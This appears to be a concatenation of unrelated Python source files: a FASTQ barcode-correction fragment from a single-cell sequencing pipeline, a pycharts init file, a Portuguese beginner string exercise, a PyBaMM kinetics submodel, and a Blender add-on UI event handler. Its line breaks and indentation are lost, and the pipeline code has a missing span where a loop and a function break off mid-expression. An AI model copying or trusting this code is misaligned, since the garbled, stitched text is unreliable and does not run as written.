int(bc_edit_dist[1]) bc_edit_dist3 = int(bc_edit_dist[2]) tag_edit_dist_atac = int(tag_edit_dist[0]) tag_edit_dist_rna = int(tag_edit_dist[1]) def check_pkl(barcode_n): if not os.path.exists(bcset+'/barcode%s.txt'%barcode_n): sys.exit('Error: No barcode%s.txt'%barcode_n) elif not os.path.exists(bcset+'/bc_dict_%s_%s.pkl'%(barcode_n,method)): write_pkl(method,bcset) check_pkl('1') check_pkl('2') check_pkl('3') with open(bcset+'/bc_dict_1_%s.pkl'%method, 'rb') as f: edit_dict_v1 = pickle.load(f) with open(bcset+'/bc_dict_2_%s.pkl'%method, 'rb') as f: edit_dict_v2 = pickle.load(f) with open(bcset+'/bc_dict_3_%s.pkl'%method, 'rb') as f: edit_dict_v3 = pickle.load(f) parse_bc_dir=output_dir+'/parse_bc' if not os.path.exists(parse_bc_dir): os.makedirs(parse_bc_dir) # Read in barcode sequences bc1 = pd.read_csv(bcset+'/barcode1.txt',names=['barcode'],index_col=0, sep='\t').barcode.values bc2 = pd.read_csv(bcset+'/barcode2.txt',names=['barcode'],index_col=0, sep='\t').barcode.values bc3 = pd.read_csv(bcset+'/barcode3.txt',names=['barcode'],index_col=0, sep='\t').barcode.values bc1_edit_dict = edit_dict_v1 bc2_edit_dict = edit_dict_v2 bc3_edit_dict = edit_dict_v3 def correct_barcodes(bc1,bc2,bc3, counts, bc1_dict=bc1_edit_dict,bc2_dict=bc2_edit_dict,bc3_dict=bc3_edit_dict): bc1_matches,edit_dist1 = get_min_edit_dists(bc1,bc1_dict,max_d=bc_edit_dist1) bc2_matches,edit_dist2 = get_min_edit_dists(bc2,bc2_dict,max_d=bc_edit_dist2) bc3_matches,edit_dist3 = get_min_edit_dists(bc3,bc3_dict,max_d=bc_edit_dist3) if 0==edit_dist1==edit_dist2==edit_dist3: bc1_m=bc1_matches[0] bc2_m=bc2_matches[0] bc3_m=bc3_matches[0] return 'perfect',bc1_m,bc2_m,bc3_m else: matches = 0 for bc1_m in bc1_matches: for bc2_m in bc2_matches: for bc3_m in bc3_matches: try: cur_counts = counts[(bc1_m,bc2_m,bc3_m)] except: cur_counts = 0 if cur_counts>0: bc1_fixed = bc1_m bc2_fixed = bc2_m bc3_fixed = bc3_m matches += 1 #print('Fixed:',matches,\ # 'Nearest_bcs',(len(bc1_matches),len(bc2_matches),len(bc3_matches)),\ # 'Edit_dist',(edit_dist1,edit_dist2,edit_dist3)) if matches==1: return 'correct',bc1_fixed,bc2_fixed,bc3_fixed elif matches>1: return 'multi_match','','','' else: return 'no_match','','','' def check_atac_rna(tag_readcut): distance = free_divergence(tag_seq, tag_readcut) if distance <= tag_edit_dist_atac: return 'A' # atac reads elif distance >= tag_edit_dist_rna: return 'R' # rna read else: return 'W' # waste fastq_reads = 0 fastq_valid_barcode_reads = 0 bc1_Q30_sum = 0 bc2_Q30_sum = 0 bc3_Q30_sum = 0 umi_Q30_sum = 0 R1_cDNA_Q30_sum = 0 R2_cDNA_Q30_sum = 0 perfect_bc_n = 0 correct_bc_n = 0 multimatch_bc_n = 0 nomatch_bc_n = 0 atac_reads = 0 rna_reads = 0 waste_reads = 0 with open(fastq1,'r') as f1, open(fastq2,'r') as f2, \ open(fastq1_out,'w') as fout1,\ open(fastq2_out,'w') as fout2: while True: header2 = f2.readline() #bc4 = header.strip().split(':')[-1] if len(header2)==0: break seq2 = f2.readline() bc1 = seq2[umi_bc_starts[1]:umi_bc_starts[1]+umi_bc_len[1]] bc2 = seq2[umi_bc_starts[2]:umi_bc_starts[2]+umi_bc_len[2]] bc3 = seq2[umi_bc_starts[3]:umi_bc_starts[3]+umi_bc_len[3]] umi = seq2[umi_bc_starts[0]:umi_bc_starts[0]+umi_bc_len[0]] strand2 = f2.readline() qual2 = f2.readline() map_tag, bc1,bc2,bc3 = correct_barcodes(bc1,bc2,bc3, counts) if map_tag=='perfect': perfect_bc_n+=1 elif map_tag=='correct': correct_bc_n+=1 elif map_tag=='multi_match': multimatch_bc_n+=1 elif map_tag=='no_match': nomatch_bc_n+=1 cellbc_umi = bc1 + bc2 + bc3 +':' + umi header1 = f1.readline() seq1 = f1.readline() strand1 = f1.readline() 
qual1 = f1.readline() if len(cellbc_umi)==sum(umi_bc_len)+1: tag_readcut = seq2[tag_start:(tag_start+tag_length)] tag = check_atac_rna(tag_readcut) header1 = '@' + tag + '_' + bc4 + cellbc_umi + ':'+header1[1:].split()[0] +'\n' header2 = '@' + tag + '_' + bc4 + cellbc_umi + ':'+header2[1:].split()[0] +'\n' fout1.write(header1) fout1.write(seq1) fout1.write(strand1) fout1.write(qual1) fout2.write(header2) fastq_valid_barcode_reads += 1 if tag=='A': atac_reads += 1 fout2.write(seq2[(tag_start+tag_length):]) fout2.write(strand2) fout2.write(qual2[(tag_start+tag_length):]) elif tag=='R': rna_reads += 1 fout2.write(seq2[tag_start:]) fout2.write(strand2) fout2.write(qual2[tag_start:]) elif tag=='W': waste_reads +=1 fout2.write(seq2[(tag_start+tag_length):]) fout2.write(strand2) fout2.write(qual2[(tag_start+tag_length):]) fastq_reads += 1 # bc1 refers to the first barcode seen in the sequencing read, but is actually # bc3 in terms of rounds bc1_Q30_sum += np.mean([ord(c)>62 for c in qual2[umi_bc_starts[1]:umi_bc_starts[1]+umi_bc_len[1]]]) bc2_Q30_sum += np.mean([ord(c)>62 for c in qual2[umi_bc_starts[2]:umi_bc_starts[2]+umi_bc_len[2]]]) bc3_Q30_sum += np.mean([ord(c)>62 for c in qual2[umi_bc_starts[3]:umi_bc_starts[3]+umi_bc_len[3]]]) umi_Q30_sum += np.mean([ord(c)>62 for c in qual2[umi_bc_starts[0]:umi_bc_starts[0]+umi_bc_len[0]]]) # Make sure R2 length > (bc_starts[3]+umi_bc_len[3]) R2_cDNA_Q30_sum += np.mean([ord(c)>62 for c in qual2[umi_bc_starts[3]+umi_bc_len[3]:-1]]) R1_cDNA_Q30_sum += np.mean([ord(c)>62 for c in qual1[:-1]]) return_dict[chunk]=np.array([fastq_reads, fastq_valid_barcode_reads, bc1_Q30_sum, bc2_Q30_sum, bc3_Q30_sum, umi_Q30_sum, R1_cDNA_Q30_sum, R2_cDNA_Q30_sum, perfect_bc_n, correct_bc_n, multimatch_bc_n, nomatch_bc_n, atac_reads, rna_reads,waste_reads]) def preprocess_fastq(output_dir, prefix, bcset, bc4, config, nthreads): parse_bc_dir=output_dir+'/parse_bc' umi_bc_len = config.umi_bc_len umi_bc_starts = config.umi_bc_starts nthreads = int(nthreads) # Read in barcode sequences bc1 = pd.read_csv(bcset+'/barcode1.txt',names=['barcode'],index_col=0, sep='\t').barcode.values bc2 = pd.read_csv(bcset+'/barcode2.txt',names=['barcode'],index_col=0, sep='\t').barcode.values bc3 = pd.read_csv(bcset+'/barcode3.txt',names=['barcode'],index_col=0, sep='\t').barcode.values def get_perfect_bc_counts(fastq2, n_reads=1000000): #randomly choose n_reads lines=0 f=gzip.open(fastq2,'rb') for line in f: lines+=1 total_reads = lines/4 n_bin = round(int(total_reads)/n_reads-0.5) quality_scores = [] seqs = [] n = 0 with gzip.open(fastq2,'rb') as f: while n=', config.tag_edit_dist[1]) split_fq(output_dir, prefix, nthreads) manager = Manager() return_dict = manager.dict() Pros = [] for i in range(1,nthreads+1): print('Starting thread %d' %i) p = Process(target=preprocess_fastq_chunk, args=(output_dir, prefix, bcset, bc4, counts, config, return_dict, i)) Pros.append(p) p.start() for t in Pros: t.join() join_fq(output_dir, prefix, nthreads) stats_array=np.zeros(15) for i in range(1,nthreads+1): stats_array+=return_dict[i] #print(stats_array) [fastq_reads, fastq_valid_barcode_reads, bc1_Q30_sum, bc2_Q30_sum, bc3_Q30_sum, umi_Q30_sum, R1_cDNA_Q30_sum, R2_cDNA_Q30_sum, perfect_bc_n, correct_bc_n, multimatch_bc_n, nomatch_bc_n, atac_reads, rna_reads, waste_reads]=list(stats_array) with open(parse_bc_dir +'/'+prefix+ '_sequencing_stats.txt', 'w') as f: f.write('umi_Q30\t%0.4f\n' %(umi_Q30_sum/fastq_reads)) f.write('bc1_Q30\t%0.4f\n' %(bc1_Q30_sum/fastq_reads)) f.write('bc2_Q30\t%0.4f\n' 
%(bc2_Q30_sum/fastq_reads)) f.write('bc3_Q30\t%0.4f\n' %(bc3_Q30_sum/fastq_reads)) f.write('R2_tag+cDNA_Q30\t%0.4f\n' %(R2_cDNA_Q30_sum/fastq_reads)) f.write('R1_cDNA_Q30\t%0.4f\n' %(R1_cDNA_Q30_sum/fastq_reads)) with open(parse_bc_dir +'/'+prefix+ '_pipeline_stats.txt', 'w') as f: f.write('fastq_reads\t%d\n' %fastq_reads) f.write('fastq_valid_barcode_reads\t%d\n' %fastq_valid_barcode_reads) f.write('--ATAC_valid_barcode_reads\t%d\n' %atac_reads) f.write('--RNA_valid_barcode_reads\t%d\n' %rna_reads) f.write('--Undetermined_valid_barcode_reads\t%d\n' %waste_reads) f.write('fastq_valid_rate\t%0.4f\n' %(fastq_valid_barcode_reads*1.0/fastq_reads)) f.write('--ATAC_valid\t%0.4f\n' %(atac_reads*1.0/fastq_reads)) f.write('--RNA_valid\t%0.4f\n' %(rna_reads*1.0/fastq_reads)) f.write('--Undetermined_valid\t%0.4f\n' %(waste_reads*1.0/fastq_reads)) f.write('--perfect_match\t%0.4f\n' %(perfect_bc_n*1.0/fastq_reads)) f.write('--correct_match\t%0.4f\n' %(correct_bc_n*1.0/fastq_reads)) f.write('multi_match\t%0.4f\n' %(multimatch_bc_n*1.0/fastq_reads)) f.write('no_match\t%0.4f\n' %(nomatch_bc_n*1.0/fastq_reads)) f.write('total_barcode_num\t%d\n' %len(counts.keys())) f.write('perfect_barcodes_all\t%0.4f\n'%perfect_rate[0]) f.write('perfect_barcode1\t%0.4f\n'%perfect_rate[1]) f.write('perfect_barcode2\t%0.4f\n'%perfect_rate[2]) f.write('perfect_barcode3\t%0.4f\n'%perfect_rate[3]) for i in range(1,int(nthreads)+1): os.remove(output_dir +'/trimmed/'+prefix+ '_R1.chunk%d.fastq' %i) os.remove(output_dir +'/trimmed/'+prefix+ '_R2.chunk%d.fastq' %i) os.remove(output_dir +'/parse_bc/'+prefix+ '_tag_barcode_R1.chunk%d.fastq' %i) os.remove(output_dir +'/parse_bc/'+prefix+ '_tag_barcode_R2.chunk%d.fastq' %i) if __name__=='__main__': import sys import importlib output_dir='/Share2/home/zhangqf5/yanqiu/scAR/output/test_set3' #prefix='test' prefix='W56' bcset='Data/barcodes/bcset1_all' bc4='testxxx.' config_file='config_10nt' nthreads=10 config = importlib.import_module(config_file) preprocess_fastq(output_dir, prefix, bcset, bc4, config, nthreads) #join_fq(output_dir, prefix, nthreads) pycharts2/__init__.py0 # from __future__ import absolute_import from ._Chart import Chart ex004.py0 algo: str = input('Digite algo:') print('O tipo de primitivo da variável é ', type(algo)) print('É um número? ', algo.isnumeric()) print('É alfabético?', algo.isalpha()) print('É decimal?', algo.isdecimal()) print('Esta em minusculas?',algo.islower()) # # Leading-order diffusion limited kinetics # from .base_diffusion_limited import BaseModel class LeadingOrderDiffusionLimited(BaseModel): """ Leading-order submodel for diffusion-limited kinetics Parameters ---------- param : model parameters domain : str The domain to implement the model, either: 'Negative' or 'Positive'. **Extends:** :class:`pybamm.interface.diffusion_limited.BaseModel` """ def __init__(self, param, domain): super().__init__(param, domain) def _get_diffusion_limited_current_density(self, variables): if self.domain == "Negative": j_p = variables[ "X-averaged positive electrode" + self.reaction_name + " interfacial current density" ] j = -self.param.l_p * j_p / self.param.l_n return j def _get_j_diffusion_limited_first_order(self, variables): """ First-order correction to the interfacial current density due to diffusion-limited effects. 
For a general model the correction term is zero, since the reaction is not diffusion-limited """ j_leading_order = variables[ "Leading-order x-averaged " + self.domain.lower() + " electrode" + self.reaction_name + " interfacial current density" ] param = self.param if self.domain == "Negative": N_ox_s_p = variables["Oxygen flux"].orphans[1] N_ox_neg_sep_interface = N_ox_s_p[0] j = -N_ox_neg_sep_interface / param.C_e / param.s_ox_Ox / param.l_n return (j - j_leading_order) / param.C_e ''' Copyright (C) 2021 CG Cookie http://cgcookie.com Created by , This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . ''' import os import re import sys import math import time import random import traceback import contextlib from math import floor, ceil from inspect import signature from itertools import dropwhile import bpy import bgl import blf import gpu from gpu.types import GPUOffScreen from gpu_extras.presets import draw_texture_2d from mathutils import Vector, Matrix from .ui_linefitter import LineFitter from .ui_core import UI_Element, UI_Element_PreventMultiCalls, DEBUG_COLOR_CLEAN from .blender import tag_redraw_all from .ui_styling import UI_Styling, ui_defaultstylings from .ui_utilities import helper_wraptext, convert_token_to_cursor from .drawing import ScissorStack, FrameBuffer from .fsm import FSM from .useractions import ActionHandler from .boundvar import BoundVar from .debug import debugger, dprint, tprint from .decorators import debug_test_call, blender_version_wrapper, add_cache from .fontmanager import FontManager from .globals import Globals from .hasher import Hasher from .maths import Vec2D, Color, mid, Box2D, Size1D, Size2D, Point2D, RelPoint2D, Index2D, clamp, NumberUnit from .profiler import profiler, time_it from .shaders import Shader from .utils import iter_head from ..ext import png from ..ext.apng import APNG class UI_Document: default_keymap = { 'commit': {'RET',}, 'cancel': {'ESC',}, 'keypress': {c for c in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'} | {'NUMPAD_%d'%i for i in range(10)} | {'NUMPAD_PERIOD','NUMPAD_MINUS','NUMPAD_PLUS','NUMPAD_SLASH','NUMPAD_ASTERIX'} | {'ZERO', 'ONE', 'TWO', 'THREE', 'FOUR', 'FIVE', 'SIX', 'SEVEN', 'EIGHT', 'NINE'} | {'PERIOD', 'MINUS', 'SPACE', 'SEMI_COLON', 'COMMA', 'QUOTE', 'ACCENT_GRAVE', 'PLUS', 'SLASH', 'BACK_SLASH', 'EQUAL', 'LEFT_BRACKET', 'RIGHT_BRACKET'}, 'scroll top': {'HOME'}, 'scroll bottom': {'END'}, 'scroll up': {'WHEELUPMOUSE', 'PAGE_UP', 'UP_ARROW', }, 'scroll down': {'WHEELDOWNMOUSE', 'PAGE_DOWN', 'DOWN_ARROW', }, 'scroll': {'TRACKPADPAN'}, } doubleclick_time = bpy.context.preferences.inputs.mouse_double_click_time / 1000 # 0.25 wheel_scroll_lines = 3 # bpy.context.preferences.inputs.wheel_scroll_lines, see https://developer.blender.org/rBbec583951d736776d2096368ef8d2b764287ac11 allow_disabled_to_blur = False show_tooltips = True tooltip_delay = 0.50 max_click_dist = 10 # allows mouse to travel off element and still register a click event allow_click_time = 0.50 # allows for very fast clicking. 
ignore max_click_dist if time(mouseup-mousedown) is at most allow_click_time def __init__(self): self._context = None self._area = None self._exception_callbacks = [] self._ui_scale = Globals.drawing.get_dpi_mult() self._draw_count = 0 self._draw_time = 0 self._draw_fps = 0 def add_exception_callback(self, fn): self._exception_callbacks += [fn] def _callback_exception_callbacks(self, e): for fn in self._exception_callbacks: try: fn(e) except Exception as e2: print(f'UI_Document: Caught exception while calling back exception callbacks: {fn.__name__}') print(f' original: {e}') print(f' additional: {e2}') debugger.print_exception() # @profiler.function def init(self, context, **kwargs): self._callbacks = { 'preclean': set(), 'postclean': set(), 'postflow': set(), 'postflow once': set(), } self.defer_cleaning = False self._context = context self._area = context.area self.actions = ActionHandler(bpy.context, UI_Document.default_keymap) self._body = UI_Element(tagName='body', document=self) # root level element self._tooltip = UI_Element(tagName='dialog', classes='tooltip', can_hover=False, parent=self._body) self._tooltip.is_visible = False self._tooltip_message = None self._tooltip_wait = None self._tooltip_mouse = None self._reposition_tooltip_before_draw = False self.fsm = FSM(self, start='main') self.ignore_hover_change = False self._sticky_dist = 20 self._sticky_element = None # allows the mouse to drift a few pixels off before handling mouseleave self._under_mouse = None self._under_mousedown = None self._under_down = None self._focus = None self._focus_full = False self._last_mx = -1 self._last_my = -1 self._last_mouse = None self._last_under_mouse = None self._last_under_click = None self._last_click_time = 0 self._last_sz = None self._last_w = -1 self._last_h = -1 def update_callbacks(self, ui_element, force_remove=False): for cb,fn in [('preclean', ui_element.preclean), ('postclean', ui_element.postclean), ('postflow', ui_element.postflow)]: if force_remove or not fn: self._callbacks[cb].discard(ui_element) else: self._callbacks[cb].add(ui_element) @property def body(self): return self._body @property def activeElement(self): return self._focus def center_on_mouse(self, element): # centers element under mouse, must be done between first and second layout calls if element is None: return def center(): element._relative_pos = None mx,my = self.actions.mouse # w,h = element.width_pixels,element.height_pixels w,h = element.width_pixels,element._dynamic_full_size.height l = mx-w/2 t = -self._body.height_pixels + my + h/2 element.reposition(left=l, top=t) self._callbacks['postflow once'].add(center) def _reposition_tooltip(self, force=False): if self._tooltip_mouse == self.actions.mouse and not force: return self._tooltip_mouse = self.actions.mouse if self._tooltip.width_pixels is None or type(self._tooltip.width_pixels) is str or self._tooltip._mbp_width is None or self._tooltip.height_pixels is None or type(self._tooltip.height_pixels) is str or self._tooltip._mbp_height is None: ttl,ttt = self.actions.mouse else: ttl = self.actions.mouse.x if self.actions.mouse.x < self._body.width_pixels/2 else self.actions.mouse.x - (self._tooltip.width_pixels + (self._tooltip._mbp_width or 0)) ttt = self.actions.mouse.y if self.actions.mouse.y > self._body.height_pixels/2 else self.actions.mouse.y + (self._tooltip.height_pixels + (self._tooltip._mbp_height or 0)) hp = self._body.height_pixels if type(self._body.height_pixels) is not str else 0.0 self._tooltip.reposition(left=ttl, top=ttt - hp) def 
removed_element(self, ui_element): if self._under_mouse and self._under_mouse.is_descendant_of(ui_element): self._under_mouse = None if self._under_mousedown and self._under_mousedown.is_descendant_of(ui_element): self._under_mousedown = None if self._focus and self._focus.is_descendant_of(ui_element): self._focus = None # @profiler.function def update(self, context, event): if context.area != self._area: return # self._ui_scale = Globals.drawing.get_dpi_mult() UI_Element_PreventMultiCalls.reset_multicalls() w,h = context.region.width, context.region.height if self._last_w != w or self._last_h != h: # print('Document:', (self._last_w, self._last_h), (w,h)) self._last_w,self._last_h = w,h self._body.dirty(cause='changed document size', children=True) self._body.dirty_flow() tag_redraw_all("UI_Element update: w,h change") if DEBUG_COLOR_CLEAN: tag_redraw_all("UI_Element DEBUG_COLOR_CLEAN") #self.actions.update(context, event, self._timer, print_actions=False) # self.actions.update(context, event, print_actions=False) if self._sticky_element and not self._sticky_element.is_visible: self._sticky_element = None self._mx,self._my = self.actions.mouse if self.actions.mouse else (-1,-1) if not self.ignore_hover_change: self._under_mouse = self._body.get_under_mouse(self.actions.mouse) if self._sticky_element: if self._sticky_element.get_mouse_distance(self.actions.mouse) < self._sticky_dist * self._ui_scale: if self._under_mouse is None or not self._under_mouse.is_descendant_of(self._sticky_element): self._under_mouse = self._sticky_element next_message = None if self._under_mouse and self._under_mouse.title_with_for(): # and not self._under_mouse.disabled: next_message = self._under_mouse.title_with_for() if self._under_mouse.disabled: next_message = f'(Disabled) {next_message}' if self._tooltip_message != next_message: self._tooltip_message = next_message self._tooltip_mouse = None self._tooltip_wait = time.time() + self.tooltip_delay self._tooltip.is_visible = False if self._tooltip_message and time.time() > self._tooltip_wait: if self._tooltip_mouse != self.actions.mouse or self._tooltip.innerText != self._tooltip_message or not self._tooltip.is_visible: # TODO: markdown support?? 
self._tooltip.innerText = self._tooltip_message self._tooltip.is_visible = True and self.show_tooltips self._reposition_tooltip_before_draw = True tag_redraw_all("reposition tooltip") self.fsm.update() self._last_mx = self._mx self._last_my = self._my self._last_mouse = self.actions.mouse if not self.ignore_hover_change: self._last_under_mouse = self._under_mouse uictrld = False uictrld |= self._under_mouse is not None and self._under_mouse != self._body uictrld |= self.fsm.state != 'main' uictrld |= self._focus_full # uictrld |= self._focus is not None return {'hover'} if uictrld else None def _addrem_pseudoclass(self, pseudoclass, remove_from=None, add_to=None): rem = remove_from.get_pathToRoot() if remove_from else [] add = add_to.get_pathToRoot() if add_to else [] rem.reverse() add.reverse() roots = [] if rem: roots.append(rem[0]) if add: roots.append(add[0]) while rem and add and rem[0] == add[0]: rem = rem[1:] add = add[1:] # print(f'addrem_pseudoclass: {pseudoclass} {rem} {add}') self.defer_cleaning = True for root in roots: root.defer_dirty_propagation = True for e in rem: e.del_pseudoclass(pseudoclass) for e in add: e.add_pseudoclass(pseudoclass) for root in roots: root.defer_dirty_propagation = False self.defer_cleaning = False def debug_print(self): print('') print('UI_Document.debug_print') self._body.debug_print(0, set()) def debug_print_toroot(self, fromHovered=True, fromFocused=False): print('') print('UI_Document.debug_print_toroot') if fromHovered: self._debug_print(self._under_mouse) if fromFocused: self._debug_print(self._focus) def _debug_print(self, ui_from): # debug print! path = ui_from.get_pathToRoot() for i,ui_elem in enumerate(reversed(path)): def tprint(*args, extra=0, **kwargs): print(' '*(i+extra), end='') print(*args, **kwargs) tprint(str(ui_elem)) tprint(f'selector={ui_elem._selector}', extra=1) tprint(f'l={ui_elem._l} t={ui_elem._t} w={ui_elem._w} h={ui_elem._h}', extra=1) @property def sticky_element(self): return self._sticky_element @sticky_element.setter def sticky_element(self, element): self._sticky_element = element def clear_last_under(self): self._last_under_mouse = None def handle_hover(self, change_cursor=True): # handle :hover, on_mouseenter, on_mouseleave if self.ignore_hover_change: return if change_cursor and self._under_mouse and self._under_mouse._tagName != 'body': cursor = self._under_mouse._computed_styles.get('cursor', 'default') Globals.cursors.set(convert_token_to_cursor(cursor)) if self._under_mouse == self._last_under_mouse: return if self._under_mouse and not self._under_mouse.can_hover: return self._addrem_pseudoclass('hover', remove_from=self._last_under_mouse, add_to=self._under_mouse) if self._last_under_mouse: self._last_under_mouse.dispatch_event('on_mouseleave') if self._under_mouse: self._under_mouse.dispatch_event('on_mouseenter') def handle_mousemove(self, ui_element=None): ui_element = ui_element or self._under_mouse if ui_element is None: return if self._last_mouse == self.actions.mouse: return ui_element.dispatch_event('on_mousemove') def handle_keypress(self, ui_element=None): ui_element = ui_element or self._focus if self.actions.pressed('clipboard paste') and ui_element: ui_element.dispatch_event('on_paste', clipboardData=bpy.context.window_manager.clipboard) pressed = self.actions.as_char(self.actions.just_pressed) if pressed and ui_element: ui_element.dispatch_event('on_keypress', key=pressed) @FSM.on_state('main', 'enter') def modal_main_enter(self): Globals.cursors.set('DEFAULT') @FSM.on_state('main') def 
modal_main(self): # print('UI_Document.main', self.actions.event_type, time.time()) if self.actions.just_pressed: pressed = self.actions.just_pressed if pressed not in {'WINDOW_DEACTIVATE'}: if self._focus and self._focus_full: self._focus.dispatch_event('on_keypress', key=pressed) elif self._under_mouse: self._under_mouse.dispatch_event('on_keypress', key=pressed) self.handle_hover() self.handle_mousemove() if self.actions.pressed('MIDDEMOUSE'): return 'scroll' if self.actions.pressed('LEFTMOUSE', unpress=False, ignoremods=True, ignoremulti=True): if self._under_mouse == self._body: # clicking body always blurs focus self.blur() elif UI_Document.allow_disabled_to_blur and self._under_mouse and self._under_mouse.is_disabled: # user clicked on disabled element, so blur current focused element self.blur() return 'mousedown' if self.actions.pressed('SHIFT+F10'): profiler.clear() return if self.actions.pressed('SHIFT+F11'): profiler.printout() self.debug_print() return if self.actions.pressed('CTRL+SHIFT+F11'): self.debug_print_toroot() print(f'{self._under_mouse._computed_styles}') return # if self.actions.pressed('RIGHTMOUSE') and self._under_mouse: # self._debug_print(self._under_mouse) # #print('focus:', self._focus) if self.actions.pressed({'scroll top', 'scroll bottom'}, unpress=False): move = 100000 * (-1 if self.actions.pressed({'scroll top'}) else 1) self.actions.unpress() if self._get_scrollable(): self._scroll_element.scrollTop = self._scroll_last.y + move self._scroll_element._setup_ltwh(recurse_children=False) if self.actions.pressed({'scroll', 'scroll up', 'scroll down'}, unpress=False): if self.actions.event_type == 'TRACKPADPAN': move = self.actions.scroll[1] # self.actions.mouse.y - self.actions.mouse_prev.y # print(f'UI_Document.update: trackpad pan {move}') else: d = self.wheel_scroll_lines * 8 * Globals.drawing.get_dpi_mult() move = Globals.drawing.scale(d) * (-1 if self.actions.pressed({'scroll up'}) else 1) self.actions.unpress() if self._get_scrollable(): self._scroll_element.scrollTop = self._scroll_last.y + move self._scroll_element._setup_ltwh(recurse_children=False) # if self.actions.pressed('F8') and self._under_mouse: # print('\n\n') # for e in self._under_mouse.get_pathFromRoot(): # print(e) # print(e._dirty_causes) # for s in e._debug_list: # print(f' {s}') if False: print('---------------------------') if self._focus: print('FOCUS', self._focus, self._focus.pseudoclasses) else: print('FOCUS', None) if self._under_down: print('DOWN', self._under_down, self._under_down.pseudoclasses) else: print('DOWN', None) if under_mouse: print('UNDER', under_mouse, under_mouse.pseudoclasses) else: print('UNDER', None) def _get_scrollable(self): # find first along root to path that can scroll if not self._under_mouse: return None self._scroll_element = next((e for e in self._under_mouse.get_pathToRoot() if e.is_scrollable_y), None) if self._scroll_element: self._scroll_last = RelPoint2D((self._scroll_element.scrollLeft, self._scroll_element.scrollTop)) return self._scroll_element @FSM.on_state('scroll', 'can enter') def scroll_canenter(self): if not self._get_scrollable(): return False @FSM.on_state('scroll', 'enter') def scroll_enter(self): self._scroll_point = self.actions.mouse self.ignore_hover_change = True Globals.cursors.set('SCROLL_Y') @FSM.on_state('scroll') def scroll_main(self): if self.actions.released('MIDDLEMOUSE', ignoremods=True, ignoremulti=True): # done scrolling return 'main' nx = self._scroll_element.scrollLeft + (self._scroll_point.x - self._mx) ny = 
self._scroll_element.scrollTop - (self._scroll_point.y - self._my) self._scroll_element.scrollLeft = nx self._scroll_element.scrollTop = ny self._scroll_point = self.actions.mouse self._scroll_element._setup_ltwh(recurse_children=False) @FSM.on_state('scroll', 'exit') def scroll_exit(self): self.ignore_hover_change = False @FSM.on_state('mousedown', 'can enter') def mousedown_canenter(self): return self._focus or ( self._under_mouse and self._under_mouse != self._body and not self._under_mouse.is_disabled ) @FSM.on_state('mousedown', 'enter') def mousedown_enter(self): self._mousedown_time = time.time() self._under_mousedown = self._under_mouse if not self._under_mousedown: # likely, self._under_mouse or an ancestor was deleted? # mousedown main event handler below will switch FSM back to main, effectively ignoring the mousedown event # see RetopoFlow issue #857 self.blur() return self._addrem_pseudoclass('active', add_to=self._under_mousedown) self._under_mousedown.dispatch_event('on_mousedown') # print(self._under_mouse.get_pathToRoot()) change_focus = self._focus != self._under_mouse if change_focus: if self._under_mouse.can_focus: # element under mouse takes focus (or whichever it's for points to) if self._under_mouse.forId: f = self._under_mouse.get_for_element() if f and f.can_focus: self.focus(f) else: self.focus(self._under_mouse) else: self.focus(self._under_mouse) elif self._focus and self._is_ancestor(self._focus, self._under_mouse): # current focus is an ancestor of new element, so don't blur! pass else: self.blur() @FSM.on_state('mousedown') def mousedown_main(self): if not self._under_mousedown: return 'main' if self.actions.released('LEFTMOUSE', ignoremods=True, ignoremulti=True): # done with mousedown return 'focus' if self._under_mousedown.can_focus else 'main' if self.actions.pressed('RIGHTMOUSE', ignoremods=True, unpress=False): self._under_mousedown.dispatch_event('on_mousedown') self.handle_hover(change_cursor=False) self.handle_mousemove(ui_element=self._under_mousedown) self.handle_keypress(ui_element=self._under_mousedown) @FSM.on_state('mousedown', 'exit') def mousedown_exit(self): if not self._under_mousedown: # likely, self._under_mousedown or an ancestor was deleted while under mousedown # need to reset variables enough to get us back to main FSM state! 
self._last_under_click = None self._last_click_time = 0 self.ignore_hover_change = False return self._under_mousedown.dispatch_event('on_mouseup') under_mouseclick = self._under_mousedown click = False click |= time.time() - self._mousedown_time < self.allow_click_time click |= self._under_mousedown.get_mouse_distance(self.actions.mouse) <= self.max_click_dist * self._ui_scale if not click: # find closest common ancestor of self._under_mouse and self._under_mousedown that is getting clicked ancestors0 = self._under_mousedown.get_pathFromRoot() ancestors1 = self._under_mouse.get_pathFromRoot() if self._under_mouse else [] ancestors = [a0 for (a0, a1) in zip(ancestors0, ancestors1) if a0 == a1 and a0.get_mouse_distance(self.actions.mouse) < 1] if ancestors: under_mouseclick = ancestors[-1] click = True # print('mousedown_exit', time.time()-self._mousedown_time, self.allow_click_time, self.actions.mouse, self._under_mousedown.get_mouse_distance(self.actions.mouse), self.max_click_dist) if click: # old/simple: self._under_mouse == self._under_mousedown: dblclick = True dblclick &= under_mouseclick == self._last_under_click dblclick &= time.time() < self._last_click_time + self.doubleclick_time under_mouseclick.dispatch_event('on_mouseclick') self._last_under_click = under_mouseclick if dblclick: under_mouseclick.dispatch_event('on_mousedblclick') # self._last_under_click = None # if self._under_mousedown: # # if applicable, send mouseclick events to ui_element indicated by forId # ui_for = self._under_mousedown.get_for_element() # print(f'mousedown_exit:') # print(f' ui under: {self._under_mousedown}') # print(f' ui for: {ui_for}') # if ui_for: ui_for.dispatch_event('on_mouseclick') self._last_click_time = time.time() else: self._last_under_click = None self._last_click_time = 0 self._addrem_pseudoclass('active', remove_from=self._under_mousedown) # self._under_mousedown.del_pseudoclass('active') def _is_ancestor(self, ancestor, descendant): return ancestor in descendant.get_pathToRoot() def blur(self, stop_at=None): self._focus_full = False if self._focus is None: return self._focus.del_pseudoclass('focus') self._focus.dispatch_event('on_blur') self._focus.dispatch_event('on_focusout', stop_at=stop_at) self._addrem_pseudoclass('active', remove_from=self._focus) self._focus = None def focus(self, ui_element, full=False): if ui_element is None: return if self._focus == ui_element: return stop_focus_at = None if self._focus: stop_blur_at = None p_focus = ui_element.get_pathFromRoot() p_blur = self._focus.get_pathFromRoot() for i in range(min(len(p_focus), len(p_blur))): if p_focus[i] != p_blur[i]: stop_focus_at = p_focus[i] stop_blur_at = p_blur[i] break self.blur(stop_at=stop_blur_at) #print('focusout to', p_blur, stop_blur_at) #print('focusin from', p_focus, stop_focus_at) self._focus_full = full self._focus = ui_element self._focus.add_pseudoclass('focus') 